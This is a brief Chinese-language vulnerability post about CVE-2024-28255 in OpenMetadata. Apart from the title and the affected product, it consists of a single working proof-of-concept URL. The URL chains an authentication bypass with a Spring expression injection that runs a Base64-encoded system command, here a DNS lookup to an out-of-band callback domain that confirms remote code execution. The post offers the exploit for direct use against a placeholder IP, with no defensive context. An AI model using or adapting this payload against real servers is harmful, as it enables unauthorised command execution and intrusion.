CVE-2024-28255

CVE-2024-28255

原创 A___bandon 漏洞猎人 2024-04-15 07:16

使使使

影响版本

OpenMetadata

poc&exp

http://xxx.xxx.xxx.xxx/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgY29hdnJmdGJscTYyY2syajRiaWdkaHV0a2J0ZDFtd2Q1Lm9hc3Qub25saW5l%22)))